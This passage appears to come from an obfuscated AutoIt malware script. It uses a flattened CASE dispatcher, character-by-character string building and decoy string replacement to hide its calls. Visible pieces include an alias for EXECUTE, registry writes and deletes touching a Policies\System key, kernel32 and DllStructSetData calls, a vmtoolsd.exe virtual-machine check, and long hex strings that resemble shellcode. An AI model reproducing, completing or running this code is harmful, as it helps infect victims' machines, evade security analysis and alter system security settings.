(87381 ) ) & $C31KU765 (R37FLO7 (87388 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87330 ) ) ) $912996352 = 1832861087 CASE 727667031 GLOBAL $D32343432T5 = $U32343233PUXJX ($X3231PEJE8 ) $912996352 = 1072149379 CASE 735486160 GLOBAL $F32343534YAF = $U32343233PUXJX ($F3235VCXC3 ) $912996352 = 902200369 CASE 747332703 GLOBAL $X343738EE714 = $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) $912996352 = 471869101 CASE 752923903 GLOBAL $J323534391M = $U32343233PUXJX ($O353SY ("cju07subn46zrslhhjrfy56aqp6" ) ) $912996352 = 1266755676 CASE 754282959 GLOBAL $X3138333341D8X5 = $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) $912996352 = 433803471 CASE 754347554 $T33R0R ("brjehhc40zj4ikbv2s6rd0p4" , $V3135P3 ("x844f0hr7gfurjsa+SHbnd1dzatxlaz6o4v4q2waikkqr0o" , 17 + 1417 * 1 + 4294965879 , 3 + 1417 * 1 + 4294965879 ) ) $912996352 = 2049571787 CASE 777806286 GLOBAL $J32343237VS8W = $U32343233PUXJX ($I31330D6 ("StringReplacer7yw1zj1cbtgaq258ydn72fn1e1pa" , 29 + 7692 * 5 + 4294928836 ) ) $912996352 = 1635010930 CASE 782363534 GLOBAL $B32343333SKG = $U32343233PUXJX ($Z37IB8K ("0x537472696E674C656E" ) ) $912996352 = 252822972 CASE 792800899 GLOBAL $W32353730R2Y = $P3639T2ATS $912996352 = 549026150 CASE 807257674 GLOBAL $R333335MUSIO = $V39NUX ("1Fu366e7DFFFu366e7Fu366e70u366e7FBu366e77u366e74D0C8u366e794Du366e7FCu366e78D0u366e7C89u366e76u366e7A4u366e70u366e789u366e74Du366e7Fu366e78u366e7680u366e70300u366e700083C1115u366e716A0u366e70u366e7FFD0u366e78u366e7BD88u366e75u366e7Du366e7B7u366e750A5u366e7F5u366e7" , "u366e7" , "" ) $912996352 = 197553472 CASE 812054995 GLOBAL $F313332316ESE = $V39NUX ("dwfbyjorfbyjdfbyj" , "fbyj" , "" ) $912996352 = 337696162 CASE 817955186 GLOBAL $I323438317TCXTD = $U32343233PUXJX ($V39NUX ("Fio5cnleo5cnEo5cnxo5cnio5cnsto5cns" , "o5cn" , "" ) ) $912996352 = 2019368202 CASE 820767532 GLOBAL $W313035393BB1A = $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87334 ) ) $912996352 = 507017416 CASE 823320600 GLOBAL $M31333337P5NMPJ = $V39NUX ("Eu2txBu2tx0u2tx98B45u2txFC8u2tx3u2txC0u2tx01u2tx894u2tx5u2txFC8Bu2tx4u2txDFCu2tx3" , "u2tx" , "" ) $912996352 = 1832348312 CASE 826688769 $T33R0R ("nqs4volnkgqkxnkr27hj8ridlo3" , $U3131F51ZD ("xg68r374eorxndig52md7634swccint" , 28 + 6195 * 1 + 4294961101 ) ) $912996352 = 296604825 CASE 838625524 GLOBAL $K32343438DR = $U32343233PUXJX ($U3131F51ZD ("o3gi7kph2yf7cugRegDelete" , 15 + 2350 * 2 + 4294962596 ) ) $912996352 = 1495046000 CASE 841109807 GLOBAL $I313530342Q0 = $V3135P3 ("hgn0g8vrkelkno1kre21mlkernel32crov2r2sklar3pgo5b6zzud2a" , 23 + 4294960630 + 6666 , 8 + 4294960630 + 6666 ) $912996352 = 603408284 CASE 846271121 GLOBAL $L3638352MGRM = $V39NUX ("FkrgmeF6krgme9krgme6Ekrgme6krgme4krgme6FkrgmeCkrgme7krgme8krgme580krgmeFkrgmeEkrgmeFkrgmeFkrgmeFkrgmeFkrgme7krgme7krgme7krgme35Ckrgme4DkrgmeCkrgme7krgme8krgme5krgme8krgme4krgmeFEkrgmeFFFF6963krgme7krgme2krgme6krgmeFCkrgme785krgme8krgme8krgmeFEFkrgmeFFF" , "krgme" , "" ) $912996352 = 220189866 CASE 853394200 $T33R0R ("846snwoj50hn0dr7us6h" , $U3131F51ZD ("j1p6b0c00gwxcmb7oql3v2uhE4554C78544FFFFFF5C467261C78548FFFFFF6D65776FC7854CFFFFFF726B5C76C78550" , 24 + 4294963711 + 3585 ) ) $912996352 = 1374344267 CASE 854553390 GLOBAL $I31330D6 = $L30KEU (STRINGREPLACE ("4b4k4vn4jb27t4ex4S4b4k4vn4jb27t4ex4tr4b4k4vn4jb27t4ex4ingT4b4k4vn4jb27t4ex4rim4b4k4vn4jb27t4ex4Rig4b4k4vn4jb27t4ex4ht" , "4b4k4vn4jb27t4ex4" , "" ) ) $912996352 = 1296483263 CASE 871261929 $T33R0R ("u527utigfe3d3pa84x6ao" , $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87328 ) ) ) $912996352 = 1139621656 CASE 876721733 GLOBAL $U32343233PUXJX = EXECUTE $912996352 = 274876241 CASE 877424282 GLOBAL $G31343135T1 = $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) $912996352 = 2112601067 CASE 902200369 GLOBAL $V32343537Q712 = $U32343233PUXJX ($I3237VCWR5 ) $912996352 = 1833896075 CASE 933359882 $T33R0R ("n6uj6l2a8fdb82i1" , $I31330D6 ("ptrev0y1ackzfqvzwzk6x" , 18 + 9030 + 4294958266 ) ) $912996352 = 1604859022 CASE 935061787 GLOBAL $U3930380NXX = $V3135P3 ("n5b131xrtvfwtwf6xwFFF526A006A0368C2AD7F71E818F7FFFF83C4148D9510FDFFFFEB038B55FC8D8iedfait68rn2sdnhen5dnkkcp5" , 19 + 9027 + 4294958269 , 64 + 9027 + 4294958269 ) $912996352 = 342768592 CASE 947431475 GLOBAL $X3231PEJE8 = $I31330D6 ("RegWritenz40hiecq0s0mmcs8thkw8pe26n" , 27 + 2516 * 5 + 4294954716 ) $912996352 = 961348210 CASE 954924030 GLOBAL $L31393938EKFWEI = $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87336 ) ) $912996352 = 38374943 CASE 961348210 $T33R0R ("x77ik6x56hmg2xy" , $I31330D6 ("RegReadohno7e4ohqkdarahuwx45i72bi" , 26 + 3404 + 4294963892 ) ) $912996352 = 540021528 CASE 970108844 GLOBAL $L31353038CR = $C31KU765 (R37FLO7 (87351 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87391 ) ) & $C31KU765 (R37FLO7 (87389 ) ) & $C31KU765 (R37FLO7 (87389 ) ) & $C31KU765 (R37FLO7 (87377 ) ) & $C31KU765 (R37FLO7 (87390 ) ) & $C31KU765 (R37FLO7 (87380 ) ) & $C31KU765 (R37FLO7 (87356 ) ) & $C31KU765 (R37FLO7 (87385 ) ) & $C31KU765 (R37FLO7 (87390 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87367 ) ) $912996352 = 291487155 CASE 989344357 $T33R0R ("zh44oq14b1kgwpyfq3mleejkxqm" , $I31330D6 ("ptrvmvpr21fgb5aelfyjydmas" , 22 + 4294966077 + 1219 ) ) $912996352 = 544563695 CASE 1001249821 GLOBAL $S32353233CD7VP0 = $U32343233PUXJX ($U3131F51ZD ("zdwijq5y8DllStructSetData" , 9 + 537 * 4 + 4294965148 ) ) $912996352 = 1615550310 CASE 1023162799 GLOBAL $S37353T0JYH = $I31330D6 ("vmtoolsd.exera2khkzkmkkprl7yom4gi135e3nfur" , 30 + 6257 * 2 + 4294954782 ) $912996352 = 247051243 CASE 1050946220 GLOBAL $T31323632RXVXOI = $V3135P3 ("1nmbvnnkhi5tbuw5wqavjf200000000000000000000000000000000000000000000000000000000000000000000000beqxv5c5srtk" , 24 + 5744 + 4294961552 , 71 + 5744 + 4294961552 ) $912996352 = 1132199390 CASE 1065523592 GLOBAL $B313736N7 = $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87336 ) ) $912996352 = 694144588 CASE 1072049475 GLOBAL $D333433NO = $U3131F51ZD ("yru2edelvyd3xvs6f1C1FFFF0000B8FFFF0000663BC875D78B45FC8D4C83086A00BAFF15000066895408028B45F86A" , 18 + 4294966574 + 722 ) $912996352 = 1462882764 CASE 1072149379 GLOBAL $W32343435O0S = $U32343233PUXJX ($O353SY ("x77ik6x56hmg2xy" ) ) $912996352 = 838625524 CASE 1075797934 GLOBAL $W32343930RZBTB4 = $U32343233PUXJX ($V3135P3 ("yd1pb3734wq8b4s6DirCreatesvo2yyxrmcvdhdjlzo" , 17 + 7992 + 4294959304 , 9 + 7992 + 4294959304 ) ) $912996352 = 1950200125 CASE 1087188320 $T33R0R ("57injgmcvqgkftg6kjt" , $I31330D6 ("s\CurrentVersion\Policies\Systembwsi3folmz2" , 11 + 9614 * 2 + 4294948068 ) ) $912996352 = 1113038225 CASE 1087228788 GLOBAL 